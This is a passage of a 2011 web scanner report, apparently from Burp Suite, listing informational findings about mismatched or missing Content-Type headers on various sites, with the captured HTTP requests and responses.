Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.vm.ibm.com/overview/; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:08 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 77

{avg_rating: 3.9876543209876543, num_ratings: 162, error_code: 0, voted: 0}

28.94. http://www.mailjet.com/ajax/home/emailLiveCounter  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mailjet.com
Path:   /ajax/home/emailLiveCounter

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /ajax/home/emailLiveCounter HTTP/1.1
Host: www.mailjet.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=US-EN-smtp; mail_session=170C5t%2BzRJJ5t%2FWv1ULaD7bK8ItpVy7iytSGyaHePyLTX3sJaU19v5y8r3EqdHTwSZqUba4mEDAu6RDO9Yume6Q36MZp83YIr9SG%2FlelT9kxkMl79h2fHQh0O99uPuUyb0tsP0Am4hqjnlwkjdwf3bKJEh5B4ef6HZGtsFVnueph1WcP2gdunPQaT9H2VRZjw2pSGuUM6ZZDJhb1sxZ5OXehfHhdgKf66xZbmq4SMsKU%2FAtkCbqGWzWB852Yjqf4WEj%2BRsv69x9nkcCHxWvHd1TVykmWxj2ueoG6%2F8GzE45ZTkb8dsc9YMpK5gpeXkmX6S02L0Ej7oGv847c92MA54RQPQDrWdNNKWh0o0dYCYrNIh56EJz8ptb%2F0P4py9guha4Joj1q%2F05fAK4M1gcl3VB8FHX1awSWpfQfK7JrK5%2FA0qyaJ0ss4jP3CQaDDo%2BFSKPSdP4Qa05YuQh2Wz%2BA6O4Gcqc2kFssi3b8JHpsBkWyN0pVa3MtlhaDtzLZQIUrsUYXs6zSxXwoPEbQ7UlMzMvBZJTAR39lBjutvOvY810HOw98wbRhbDR%2BqD8FSjECOcFI3dwqrLkbnurRGcgvV5DQWTaP9PiIbUAdzzNx1Tg5yjruOvau6y4p7H5u9Zj7; __utma=176514170.637056612.1316204845.1316216714.1316228159.3; __utmb=176514170.1.10.1316228159; __utmc=176514170; __utmz=176514170.1316228159.3.3.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:54:45 GMT
Server: MJWS/1.0
Content-Type: text/html; charset=utf-8
Content-Length: 10

45,770,192

28.95. http://www.mokafive.com/highslide/graphics/zoomin.cur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mokafive.com
Path:   /highslide/graphics/zoomin.cur

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /highslide/graphics/zoomin.cur HTTP/1.1
Host: www.mokafive.com
Proxy-Connection: keep-alive
Referer: http://www.mokafive.com/BetterWayVDI?gclid=CLDCgauCo6sCFccaQgodS3zc1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=249447707.266844713.1316237212.1316237212.1316237212.1; __utmb=249447707.3.10.1316237212; __utmc=249447707; __utmz=249447707.1316237212.1.1.utmgclid=CLDCgauCo6sCFccaQgodS3zc1A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=virtual%20desktop

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:25:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 23 Mar 2010 04:28:26 GMT
ETag: "1448012-146-482703ea82e80"
Accept-Ranges: bytes
Content-Length: 326
Content-Type: text/plain; charset=UTF-8

...... ......0.......(... ...@.............................................................................................p............... ...@.........."..33..$    ..$    ..33..."........................
...[SNIP]...

28.96. http://www.mokafive.com/highslide/graphics/zoomout.cur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mokafive.com
Path:   /highslide/graphics/zoomout.cur

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /highslide/graphics/zoomout.cur HTTP/1.1
Host: www.mokafive.com
Proxy-Connection: keep-alive
Referer: http://www.mokafive.com/BetterWayVDI?gclid=CLDCgauCo6sCFccaQgodS3zc1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vt_=MWQ3NDI3NWUyZGE0MWM0N2NhN2YxYzlhNzA3NTQ4OTQ%3D; __utma=249447707.266844713.1316237212.1316237212.1316237212.1; __utmb=249447707.5.10.1316237212; __utmc=249447707; __utmz=249447707.1316237212.1.1.utmgclid=CLDCgauCo6sCFccaQgodS3zc1A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=virtual%20desktop

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:25:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 23 Mar 2010 04:28:26 GMT
ETag: "1448013-146-482703ea82e80"
Accept-Ranges: bytes
Content-Length: 326
Content-Type: text/plain; charset=UTF-8

...... ......0.......(... ...@.............................................................................................p............... ...@.............7...$    ..$    ..7.............................
...[SNIP]...

28.97. http://www.mokafive.com/images/mokafive_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mokafive.com
Path:   /images/mokafive_favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/mokafive_favicon.ico HTTP/1.1
Host: www.mokafive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vt_=MWQ3NDI3NWUyZGE0MWM0N2NhN2YxYzlhNzA3NTQ4OTQ%3D; __utma=249447707.266844713.1316237212.1316237212.1316237212.1; __utmb=249447707.5.10.1316237212; __utmc=249447707; __utmz=249447707.1316237212.1.1.utmgclid=CLDCgauCo6sCFccaQgodS3zc1A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=virtual%20desktop

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:25:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 16 Oct 2009 00:56:05 GMT
ETag: "88c08a-47e-47602dc4eb340"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

28.98. http://www.open.com.au/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.open.com.au
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.open.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 25 Jan 2005 06:24:18 GMT
ETag: "2382ce-57e-5dd82880"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...

28.99. https://www.open.com.au/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.open.com.au
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.open.com.au
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:27 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 25 Jan 2005 06:24:18 GMT
ETag: "2382ce-57e-5dd82880"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...

28.100. http://www.radius-server.net/images/bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.radius-server.net
Path:   /images/bg.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain HTML.

Request

GET /images/bg.gif HTTP/1.1
Host: www.radius-server.net
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:38 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
Last-Modified: Wed, 30 Jan 2008 07:34:59 GMT
ETag: "187806c-120-444eb94112ec0"
Accept-Ranges: bytes
Content-Length: 288
Content-Type: image/gif

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /aradial/images/bg.gif was not found on this server.<P>

...[SNIP]...

28.101. http://www.radius-server.net/images/logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.radius-server.net
Path:   /images/logo.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/logo.gif HTTP/1.1
Host: www.radius-server.net
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:33 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
Last-Modified: Thu, 08 Oct 2009 07:53:45 GMT
ETag: "18782fd-1ca3-47567c344f440"
Accept-Ranges: bytes
Content-Length: 7331
Content-Type: image/gif

......JFIF.....,.,......Exif..II*.................$.........b...........j...(...........1.......r...2...........i...............,.......,.......Paint.NET v3.36.2009:03:01 10:28:20.....................
...[SNIP]...

28.102. http://www.radius-server.net/images/sm-adv.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.radius-server.net
Path:   /images/sm-adv.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/sm-adv.gif HTTP/1.1
Host: www.radius-server.net
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=82844181.33199707.1316220331.1316220331.1316220331.1; __utmb=82844181; __utmc=82844181; __utmz=82844181.1316220331.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:46 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
Last-Modified: Sat, 02 Feb 2008 08:49:52 GMT
ETag: "1878026-e18-44528f9650c00"
Accept-Ranges: bytes
Content-Length: 3608
Content-Type: image/gif

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................-....
...[SNIP]...

28.103. http://www.radius-server.net/images/telelogo.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.radius-server.net
Path:   /images/telelogo.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/telelogo.gif HTTP/1.1
Host: www.radius-server.net
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=82844181.33199707.1316220331.1316220331.1316220331.1; __utmb=82844181; __utmc=82844181; __utmz=82844181.1316220331.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:46 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
Last-Modified: Wed, 30 Jan 2008 07:36:45 GMT
ETag: "187804b-c947-444eb9a629d40"
Accept-Ranges: bytes
Content-Length: 51527
Content-Type: image/gif

......JFIF.....`.`......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS2 Macintosh.2006:09:20 15:03:41.......
...[SNIP]...

28.104. http://www.radius.cistron.nl/README.pam  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.radius.cistron.nl
Path:   /README.pam

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /README.pam HTTP/1.1
Host: www.radius.cistron.nl
Proxy-Connection: keep-alive
Referer: http://www.radius.cistron.nl/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:47:45 GMT
Server: Apache/2.2.9
Vary: Host
Last-Modified: Wed, 08 Feb 2006 17:11:58 GMT
ETag: "7da-40c4b97f8e598"
Accept-Ranges: bytes
Content-Length: 2010
Content-Type: text/plain


       PAM Support for Cistron-radiusd


0. INTRODUCTION

PAM support was done by Jeph Blaize. Miguel a.l. Paraz <map@iphil.net>
ported it to Cistron-Radius. Chris Dent <cdent@kiva.net> added the

...[SNIP]...

28.105. http://www.thundernews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thundernews.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.thundernews.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ivkp48lpbk512tliksia20ffj1; __utma=64644586.2073731114.1316219532.1316219532.1316219532.1; __utmb=64644586; __utmc=64644586; __utmz=64644586.1316219532.1.1.utmgclid=CIyWi8vAoqsCFQhrgwodLzuGZg|utmccn=(not+set)|utmcmd=(not+set)|utmctr=nntp+server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:27 GMT
Server: Apache
Last-Modified: Sat, 31 Oct 2009 10:36:03 GMT
ETag: "9e83b4-47e-b60caac0"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................#......m.yLE.TN.f3).......c..}/..p...w    ................g......C...\.....qA8..{v.n>5.d0&.......Q..\...V..h.................(...T...
...[SNIP]...

28.106. https://www.thundernews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.thundernews.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.thundernews.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ivkp48lpbk512tliksia20ffj1; ck_tn_user_country=-; __utma=64644586.2073731114.1316219532.1316219532.1316219532.1; __utmb=64644586; __utmc=64644586; __utmz=64644586.1316219532.1.1.utmgclid=CIyWi8vAoqsCFQhrgwodLzuGZg|utmccn=(not+set)|utmcmd=(not+set)|utmctr=nntp+server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:37:05 GMT
Server: Apache
Last-Modified: Sat, 31 Oct 2009 10:36:03 GMT
ETag: "9e83b4-47e-b60caac0"
Accept-Ranges: bytes
Content-Length: 1150
Keep-Alive: timeout=2, max=500
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................#......m.yLE.TN.f3).......c..}/..p...w    ................g......C...\.....qA8..{v.n>5.d0&.......Q..\...V..h.................(...T...
...[SNIP]...

28.107. http://www.usenetbinaries.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.usenetbinaries.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.usenetbinaries.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UBReferer=S&aw&T&1316201486&P&&K&usenet&H&2tApedj%2BMqga5hQNxux7lA&C&&R&http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dnntp%2Bserver&U&http%3A%2F%2Fwww.usenetbinaries.com%2Fl%2Fnewsgroups.html

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:29 GMT
Server: Apache
Last-Modified: Fri, 26 Feb 2010 00:18:44 GMT
ETag: "104a258-47e-48075d7a0a100"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....................................@@@.....sss.................@@...... ......................www.........DDD.....................ww..""......................DD
...[SNIP]...

28.108. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.websitealive2.com
Path:   /89/Visitor/vTracker_v2.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /89/Visitor/vTracker_v2.asp?websiteid=0&groupid=89 HTTP/1.1
Host: www.websitealive2.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Length: 8620
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
Set-Cookie: wsa=cookiedetect=True&pagesvisited%5F0=2&lastwebsiteid=0&proactiveauto%5Fenabled%5F0=N; path=/89
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 00:25:56 GMT


//alert('False');


var embed_departmentid = '0';


// keep on page
function URLEncode(plaintext)
{
   // The Javascript escape and unescape functions do not correspond
   // with what brows
...[SNIP]...

28.109. http://www.westhost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.westhost.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=472ac3b6e7c48c22718ae5d91710e815; __utma=1.643294752.1316241747.1316241747.1316241747.1; __utmb=1.1.10.1316241747; __utmc=1; __utmz=1.1316241747.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:53:07 GMT
Server: Apache/2.0.52 (Red Hat)
ETag: "15891e0-37e-79ed7740"
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: max-age=2628000, public
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................qD)qD)qD)qD)qD)qD)qD)qD)qD)qD)qD)qD)qD)qD)qD)qD)vG+vG+vG+vG+vG+vG+vG+vG+vG+vG+vG+vG+vG+vG+vG+vG+}K.}K.}K.}K.}K.}K.}K.}K........cJ}K.......
...[SNIP]...

29. Content type is not specified  previous  next
There are 6 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


29.1. http://3ps.go.com/DynamicAd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://3ps.go.com
Path:   /DynamicAd

Request

GET /DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french HTTP/1.1
Host: 3ps.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:58:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: SRV06
Content-Length: 537
Cache-control: no-cache
Pragma: no-cache

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 93093;
</script>
<script type="text/javascript" src="http:/
...[SNIP]...

29.2. http://ad.yieldmanager.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?_PVID=6uhE92KIOPrpARpjTl.wjQzIMhd7ak5z73UAB1QA&ad_type=iframe&ad_size=300x100&site=148950&section_code=14485998&cb=1316220789523047&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15r4au614/M=787833.14485998.14323833.12504472/D=o_m_g/S=2115823648:MREC/Y=YAHOO/EXP=1316227989/L=6uhE92KIOPrpARpjTl.wjQzIMhd7ak5z73UAB1QA/B=81yfSUoGYmw-/J=1316220789523047/K=5A42WHIrAcjORaNtZROV0A/A=6284798/R=0/* HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/MREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
